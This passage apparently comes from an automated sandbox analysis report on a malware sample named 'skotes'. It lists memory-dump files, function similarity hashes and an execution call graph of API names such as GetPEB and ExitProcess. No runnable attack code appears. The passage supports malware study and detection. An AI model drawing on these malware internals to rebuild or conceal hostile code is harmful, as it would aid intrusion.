                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                            • Instruction ID: dd109dc12240b70ca7c1ee05780473a8cbffe9368e155d1aac5b8166fb406241
                                                                                                                                            • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                            • Instruction Fuzzy Hash: EAB1153290464D9FDB15CFAAC9817BEBBF5EF45360F1441AAFA45EB241D6348E02CB60
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mtx_unlock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1418687624-0
                                                                                                                                            • Opcode ID: 01acaf19bacc28ee09a046355a6bfc923d9dd9bb471a36b9ffd4858dde9a6b9b
                                                                                                                                            • Instruction ID: eb7c28b0b5b1bbdbecee3cc7ccf9ea19b329fc4fb1868db2240b4385ebd16c06
                                                                                                                                            • Opcode Fuzzy Hash: 01acaf19bacc28ee09a046355a6bfc923d9dd9bb471a36b9ffd4858dde9a6b9b
                                                                                                                                            • Instruction Fuzzy Hash: 90A1B0B2A012069FDF20DB64C945B9AB7A8FF15324F15826EE816D7341EB31EA04CBD1

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:0.9%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:619
                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                            execution_graph 9684 ac5cad 9686 ac5caf shared_ptr __cftof 9684->9686 9685 ac5d17 shared_ptr std::invalid_argument::invalid_argument 9686->9685 9700 ac5c10 9686->9700 9688 ac66ac 9689 ac5c10 3 API calls 9688->9689 9690 ac66b1 9689->9690 9718 ac22c0 9690->9718 9692 ac66c9 shared_ptr 9693 ac5c10 3 API calls 9692->9693 9694 ac673d 9693->9694 9695 ac22c0 3 API calls 9694->9695 9697 ac6757 shared_ptr 9695->9697 9696 ac5c10 3 API calls 9696->9697 9697->9696 9698 ac22c0 3 API calls 9697->9698 9699 ac6852 shared_ptr std::invalid_argument::invalid_argument 9697->9699 9698->9697 9701 ac5c54 9700->9701 9721 ac4b30 9701->9721 9703 ac5d17 shared_ptr std::invalid_argument::invalid_argument 9703->9688 9704 ac5c7b shared_ptr __cftof 9704->9703 9705 ac5c10 3 API calls 9704->9705 9706 ac66ac 9705->9706 9707 ac5c10 3 API calls 9706->9707 9708 ac66b1 9707->9708 9709 ac22c0 3 API calls 9708->9709 9710 ac66c9 shared_ptr 9709->9710 9711 ac5c10 3 API calls 9710->9711 9712 ac673d 9711->9712 9713 ac22c0 3 API calls 9712->9713 9715 ac6757 shared_ptr 9713->9715 9714 ac5c10 3 API calls 9714->9715 9715->9714 9716 ac22c0 3 API calls 9715->9716 9717 ac6852 shared_ptr std::invalid_argument::invalid_argument 9715->9717 9716->9715 9717->9688 9842 ac2280 9718->9842 9723 ac4ce5 9721->9723 9724 ac4b92 9721->9724 9723->9704 9724->9723 9725 af6da6 9724->9725 9726 af6db4 9725->9726 9727 af6dc2 9725->9727 9730 af6d19 9726->9730 9727->9724 9735 af690a 9730->9735 9734 af6d3d 9734->9724 9736 af692a 9735->9736 9742 af6921 9735->9742 9736->9742 9749 afa671 9736->9749 9743 af6d52 9742->9743 9744 af6d8f 9743->9744 9745 af6d5f 9743->9745 9834 afb67d 9744->9834 9748 af6d6e 9745->9748 9829 afb6a1 9745->9829 9748->9734 9753 afa67b __dosmaperr __freea 9749->9753 9750 af694a 9754 afb5fb 9750->9754 9753->9750 9762 af8bec 9753->9762 9755 afb60e 9754->9755 9757 af6960 9754->9757 9755->9757 9788 aff5ab 9755->9788 9758 afb628 9757->9758 9759 afb63b 9758->9759 9760 afb650 9758->9760 9759->9760 9795 afe6b1 9759->9795 9760->9742 9763 af8bf1 __cftof 9762->9763 9767 af8bfc ___std_exception_copy 9763->9767 9768 afd634 9763->9768 9782 af65ed 9767->9782 9770 afd640 __cftof __dosmaperr 9768->9770 9769 afd69c __dosmaperr ___std_exception_copy 9769->9767 9770->9769 9771 afd81b __cftof 9770->9771 9772 afd726 9770->9772 9773 afd751 __cftof 9770->9773 9774 af65ed __cftof 3 API calls 9771->9774 9772->9773 9785 afd62b 9772->9785 9773->9769 9777 afa671 __cftof 3 API calls 9773->9777 9780 afd7a5 9773->9780 9776 afd82e 9774->9776 9777->9780 9779 afd62b __cftof 3 API calls 9779->9773 9780->9769 9781 afa671 __cftof 3 API calls 9780->9781 9781->9769 9783 af64c7 __cftof 3 API calls 9782->9783 9784 af65fe 9783->9784 9786 afa671 __cftof 3 API calls 9785->9786 9787 afd630 9786->9787 9787->9779 9789 aff5b7 __dosmaperr 9788->9789 9790 afa671 __cftof 3 API calls 9789->9790 9791 aff5c0 __cftof __dosmaperr 9790->9791 9792 aff606 9791->9792 9793 af8bec __cftof 3 API calls 9791->9793 9792->9757 9794 aff62b 9793->9794 9796 afa671 __cftof 3 API calls 9795->9796 9797 afe6bb 9796->9797 9800 afe5c9 9797->9800 9799 afe6c1 9799->9760 9801 afe5d5 __cftof __dosmaperr __freea 9800->9801 9802 afe5f6 9801->9802 9803 af8bec __cftof 3 API calls 9801->9803 9802->9799 9804 afe668 9803->9804 9808 afe6a4 9804->9808 9809 afa72e 9804->9809 9808->9799 9813 afa739 __dosmaperr __freea 9809->9813 9810 af8bec __cftof 3 API calls 9811 afa7c7 9810->9811 9812 afa7be 9814 afe4b0 9812->9814 9813->9810 9813->9812 9815 afe5c9 __cftof 3 API calls 9814->9815 9816 afe4c3 9815->9816 9821 afe259 9816->9821 9818 afe4cb __cftof 9820 afe4dc __cftof __dosmaperr __freea 9818->9820 9824 afe6c4 9818->9824 9820->9808 9822 af690a __cftof GetPEB ExitProcess GetPEB 9821->9822 9823 afe26b 9822->9823 9823->9818 9825 afe259 __cftof GetPEB ExitProcess GetPEB 9824->9825 9828 afe6e4 __cftof 9825->9828 9826 afe75a __cftof std::invalid_argument::invalid_argument 9826->9820 9827 afe32f __cftof GetPEB ExitProcess GetPEB 9827->9826 9828->9826 9828->9827 9830 af690a __cftof 3 API calls 9829->9830 9831 afb6be 9830->9831 9833 afb6ce std::invalid_argument::invalid_argument 9831->9833 9839 aff1bf 9831->9839 9833->9748 9835 afa671 __cftof 3 API calls 9834->9835 9836 afb688 9835->9836 9837 afb5fb __cftof 3 API calls 9836->9837 9838 afb698 9837->9838 9838->9748 9840 af690a __cftof 3 API calls 9839->9840 9841 aff1df __cftof __freea std::invalid_argument::invalid_argument 9840->9841 9841->9833 9843 ac2296 9842->9843 9846 af87f8 9843->9846 9849 af7609 9846->9849 9848 ac22a4 9848->9692 9850 af7649 9849->9850 9852 af7631 __dosmaperr ___std_exception_copy std::invalid_argument::invalid_argument 9849->9852 9851 af690a __cftof 3 API calls 9850->9851 9850->9852 9853 af7661 9851->9853 9852->9848 9855 af7bc4 9853->9855 9856 af7bd5 9855->9856 9857 af7be4 __dosmaperr ___std_exception_copy 9856->9857 9862 af8168 9856->9862 9867 af7dc2 9856->9867 9872 af7de8 9856->9872 9882 af7f36 9856->9882 9857->9852 9863 af8171 9862->9863 9864 af8178 9862->9864 9891 af7b50 9863->9891 9864->9856 9866 af8177 9866->9856 9868 af7dcb 9867->9868 9869 af7dd2 9867->9869 9870 af7b50 3 API calls 9868->9870 9869->9856 9871 af7dd1 9870->9871 9871->9856 9873 af7e09 __dosmaperr ___std_exception_copy 9872->9873 9875 af7def 9872->9875 9873->9856 9874 af7f69 9880 af7f77 9874->9880 9881 af7f8b 9874->9881 9909 af8241 9874->9909 9875->9873 9875->9874 9877 af7fa2 9875->9877 9875->9880 9877->9881 9905 af8390 9877->9905 9880->9881 9913 af86ea 9880->9913 9881->9856 9883 af7f4f 9882->9883 9884 af7f69 9882->9884 9883->9884 9886 af7fa2 9883->9886 9889 af7f77 9883->9889 9885 af8241 3 API calls 9884->9885 9887 af7f8b 9884->9887 9884->9889 9885->9889 9886->9887 9888 af8390 3 API calls 9886->9888 9887->9856 9888->9889 9889->9887 9890 af86ea 3 API calls 9889->9890 9890->9887 9892 af7b62 __dosmaperr 9891->9892 9895 af8ab6 9892->9895 9894 af7b85 __dosmaperr 9894->9866 9896 af8ad1 9895->9896 9899 af8868 9896->9899 9898 af8adb 9898->9894 9900 af887a 9899->9900 9901 af690a __cftof 3 API calls 9900->9901 9904 af888f __dosmaperr ___std_exception_copy 9900->9904 9903 af88bf 9901->9903 9902 af6d52 3 API calls 9902->9903 9903->9902 9903->9904 9904->9898 9906 af83ab 9905->9906 9907 af83dd 9906->9907 9917 afc88e 9906->9917 9907->9880 9910 af825a 9909->9910 9924 afd3c8 9910->9924 9912 af830d 9912->9880 9912->9912 9914 af875d std::invalid_argument::invalid_argument 9913->9914 9916 af8707 9913->9916 9914->9881 9915 afc88e __cftof 3 API calls 9915->9916 9916->9914 9916->9915 9920 afc733 9917->9920 9919 afc8a6 9919->9907 9921 afc743 9920->9921 9922 afc748 __cftof __dosmaperr ___std_exception_copy 9921->9922 9923 af690a __cftof 3 API calls 9921->9923 9922->9919 9923->9922 9927 afd3ee 9924->9927 9936 afd3d8 __dosmaperr ___std_exception_copy 9924->9936 9925 afd485 9929 afd4ae 9925->9929 9930 afd4e4 9925->9930 9926 afd48a 9937 afcbdf 9926->9937 9927->9925 9927->9926 9927->9936 9932 afd4cc 9929->9932 9933 afd4b3 9929->9933 9954 afcef8 9930->9954 9950 afd0e2 9932->9950 9943 afd23e 9933->9943 9936->9912 9938 afcbf1 9937->9938 9939 af690a __cftof 3 API calls 9938->9939 9940 afcc05 9939->9940 9941 afcef8 3 API calls 9940->9941 9942 afcc0d __alldvrm __cftof __dosmaperr ___std_exception_copy _strrchr 9940->9942 9941->9942 9942->9936 9946 afd26c 9943->9946 9944 afd2a5 9944->9936 9945 afd2de 9961 afcf9a 9945->9961 9946->9944 9946->9945 9947 afd2b7 9946->9947 9958 afd16d 9947->9958 9951 afd10f 9950->9951 9952 afd14e 9951->9952 9953 afd16d 3 API calls 9951->9953 9952->9936 9953->9952 9955 afcf10 9954->9955 9956 afcf9a 3 API calls 9955->9956 9957 afcf75 9955->9957 9956->9957 9957->9936 9959 af690a __cftof GetPEB ExitProcess GetPEB 9958->9959 9960 afd183 __cftof 9959->9960 9960->9944 9962 afcfab 9961->9962 9963 af690a __cftof GetPEB ExitProcess GetPEB 9962->9963 9964 afcfb9 __dosmaperr ___std_exception_copy 9962->9964 9965 afcfda ___std_exception_copy 9963->9965 9964->9944 9663 af6629 9666 af64c7 9663->9666 9667 af64d5 __cftof 9666->9667 9668 af6520 9667->9668 9671 af652b 9667->9671 9670 af652a 9677 afa302 GetPEB 9671->9677 9673 af6535 9674 af654a __cftof 9673->9674 9675 af653a GetPEB 9673->9675 9676 af6562 ExitProcess 9674->9676 9675->9674 9678 afa31c __cftof 9677->9678 9678->9673 10274 ac9ba5 10275 ac9ba7 10274->10275 10276 ac5c10 3 API calls 10275->10276 10277 ac9cb1 10276->10277 10278 ac8b30 3 API calls 10277->10278 10279 ac9cc2 10278->10279 9966 ac20a0 9969 adc68b 9966->9969 9968 ac20ac 9972 adc3d5 9969->9972 9971 adc69b 9971->9968 9973 adc3e1 9972->9973 9974 adc3eb 9972->9974 9975 adc39e 9973->9975 9976 adc3be 9973->9976 9974->9971 9975->9974 9981 adccd5 9975->9981 9985 adcd0a 9976->9985 9978 adc3d0 9978->9971 9982 adc3b7 9981->9982 9983 adcce3 InitializeCriticalSectionEx 9981->9983 9982->9971 9983->9982 9986 adcd1f RtlInitializeConditionVariable 9985->9986 9986->9978 10301 ac3fe0 10302 ac4022 10301->10302 10303 ac408c 10302->10303 10304 ac40d2 10302->10304 10307 ac4035 std::invalid_argument::invalid_argument 10302->10307 10308 ac35e0 10303->10308 10314 ac3ee0 10304->10314 10309 ac3616 10308->10309 10313 ac364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10309->10313 10320 ac2ce0 10309->10320 10311 ac369e 10311->10313 10329 ac2c00 10311->10329 10313->10307 10315 ac3f1e 10314->10315 10316 ac3f48 10314->10316 10315->10307 10317 ac3f58 10316->10317 10318 ac2c00 3 API calls 10316->10318 10317->10307 10319 ac3f7f 10318->10319 10319->10307 10321 ac2d1d 10320->10321 10322 adbedf InitOnceExecuteOnce 10321->10322 10323 ac2d46 10322->10323 10324 ac2d51 std::invalid_argument::invalid_argument 10323->10324 10326 ac2d88 10323->10326 10336 adbef7 10323->10336 10324->10311 10327 ac2440 3 API calls 10326->10327 10328 ac2d9b 10327->10328 10328->10311 10330 ac2c0e 10329->10330 10349 adb847 10330->10349 10332 ac2c42 10333 ac2c49 10332->10333 10355 ac2c80 10332->10355 10333->10313 10335 ac2c58 std::_Throw_future_error 10337 adbf03 std::_Throw_future_error 10336->10337 10338 adbf6a 10337->10338 10339 adbf73 10337->10339 10343 adbe7f 10338->10343 10341 ac2ae0 4 API calls 10339->10341 10342 adbf6f 10341->10342 10342->10326 10344 adcc31 InitOnceExecuteOnce 10343->10344 10345 adbe97 10344->10345 10346 adbe9e 10345->10346 10347 af6cbb 3 API calls 10345->10347 10346->10342 10348 adbea7 10347->10348 10348->10342 10350 adb854 10349->10350 10354 adb873 Concurrency::details::_Reschedule_chore 10349->10354 10358 adcb77 10350->10358 10352 adb864 10352->10354 10360 adb81e 10352->10360 10354->10332 10356 adb7fb TpReleaseWork 10355->10356 10357 ac2cb2 shared_ptr 10356->10357 10357->10335 10359 adcb92 CreateThreadpoolWork 10358->10359 10359->10352 10361 adb827 Concurrency::details::_Reschedule_chore 10360->10361 10364 adcdcc 10361->10364 10363 adb841 10363->10354 10365 adcde1 TpPostWork 10364->10365 10365->10363 10376 ac4120 10377 ac416a 10376->10377 10378 ac3ee0 3 API calls 10377->10378 10379 ac41b2 std::invalid_argument::invalid_argument 10377->10379 10378->10379 10280 af8bbe 10281 af8868 3 API calls 10280->10281 10282 af8bdc 10281->10282 9987 ac9ab8 9989 ac9acc 9987->9989 9990 ac9b08 9989->9990 9991 ac5c10 3 API calls 9990->9991 9992 ac9b7c 9991->9992 9999 ac8b30 9992->9999 9994 ac9b8d 9995 ac5c10 3 API calls 9994->9995 9996 ac9cb1 9995->9996 9997 ac8b30 3 API calls 9996->9997 9998 ac9cc2 9997->9998 10000 ac8b7c 9999->10000 10001 ac5c10 3 API calls 10000->10001 10003 ac8b97 shared_ptr 10001->10003 10002 ac8d01 shared_ptr std::invalid_argument::invalid_argument 10002->9994 10003->10002 10004 ac5c10 3 API calls 10003->10004 10006 ac8d9a shared_ptr 10004->10006 10005 ac8e7e shared_ptr std::invalid_argument::invalid_argument 10005->9994 10006->10005 10007 ac5c10 3 API calls 10006->10007 10008 ac8f1a shared_ptr std::invalid_argument::invalid_argument 10007->10008 10008->9994 10231 accc79 10232 accc84 shared_ptr 10231->10232 10233 acccda shared_ptr std::invalid_argument::invalid_argument 10232->10233 10234 ac5c10 3 API calls 10232->10234 10235 acce9d 10234->10235 10237 acca70 10235->10237 10238 accadd 10237->10238 10240 ac5c10 3 API calls 10238->10240 10245 accc87 10238->10245 10239 acccda shared_ptr std::invalid_argument::invalid_argument 10241 acccf9 10240->10241 10247 ac9030 10241->10247 10243 ac5c10 3 API calls 10244 acce9d 10243->10244 10246 acca70 3 API calls 10244->10246 10245->10239 10245->10243 10248 ac9080 10247->10248 10249 ac5c10 3 API calls 10248->10249 10250 ac909a shared_ptr std::invalid_argument::invalid_argument 10249->10250 10250->10245 10251 ac4276 10252 ac2410 4 API calls 10251->10252 10253 ac427f 10252->10253 10412 ac5f76 10414 ac5f81 shared_ptr 10412->10414 10413 ac5ffe shared_ptr std::invalid_argument::invalid_argument 10414->10413 10415 ac5c10 3 API calls 10414->10415 10416 ac66ac 10415->10416 10417 ac5c10 3 API calls 10416->10417 10418 ac66b1 10417->10418 10419 ac22c0 3 API calls 10418->10419 10420 ac66c9 shared_ptr 10419->10420 10421 ac5c10 3 API calls 10420->10421 10422 ac673d 10421->10422 10423 ac22c0 3 API calls 10422->10423 10427 ac6757 shared_ptr 10423->10427 10424 ac5c10 3 API calls 10424->10427 10425 ac22c0 3 API calls 10425->10427 10426 ac6852 shared_ptr std::invalid_argument::invalid_argument 10427->10424 10427->10425 10427->10426 10009 ac42b0 10012 ac3ac0 10009->10012 10011 ac42bb shared_ptr 10013 ac3af9 10012->10013 10016 ac3c38 10013->10016 10017 ac3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10013->10017 10022 ac32d0 10013->10022 10014 ac32d0 5 API calls 10019 ac3c5f 10014->10019 10016->10014 10016->10019 10017->10011 10018 ac3c68 10018->10011 10019->10018 10039 ac3810 10019->10039 10043 adc6ac 10022->10043 10025 ac333c __Mtx_unlock 10027 adc26a 4 API calls 10025->10027 10028 ac3350 std::invalid_argument::invalid_argument 10025->10028 10026 ac3314 10026->10025 10046 adc26a 10026->10046 10029 ac3377 10027->10029 10028->10016 10030 adc6ac GetSystemTimePreciseAsFileTime 10029->10030 10031 ac33af 10030->10031 10032 adc26a 4 API calls 10031->10032 10033 ac33b6 10031->10033 10032->10033 10034 adc26a 4 API calls 10033->10034 10035 ac33d7 __Mtx_unlock 10033->10035 10034->10035 10036 adc26a 4 API calls 10035->10036 10037 ac33eb 10035->10037 10038 ac340e 10036->10038 10037->10016 10038->10016 10040 ac381c 10039->10040 10084 ac2440 10040->10084 10050 adc452 10043->10050 10045 adc6b9 10045->10026 10047 adc292 10046->10047 10048 adc274 10046->10048 10047->10047 10048->10047 10067 adc297 10048->10067 10051 adc4a8 10050->10051 10054 adc47a std::invalid_argument::invalid_argument 10050->10054 10051->10054 10056 adcf6b 10051->10056 10053 adc4fd __Xtime_diff_to_millis2 10053->10054 10055 adcf6b _xtime_get GetSystemTimePreciseAsFileTime 10053->10055 10054->10045 10055->10053 10057 adcf7a 10056->10057 10059 adcf87 __aulldvrm 10056->10059 10057->10059 10060 adcf44 10057->10060 10059->10053 10063 adcbea 10060->10063 10064 adcbfb GetSystemTimePreciseAsFileTime 10063->10064 10065 adcc07 10063->10065 10064->10065 10065->10059 10070 ac2ae0 10067->10070 10069 adc2ae std::_Throw_future_error 10077 adbedf 10070->10077 10072 ac2af4 __dosmaperr 10072->10069 10073 afa671 __cftof 3 API calls 10072->10073 10076 af6ccc 10073->10076 10074 af8bec __cftof 3 API calls 10075 af6cf6 10074->10075 10076->10074 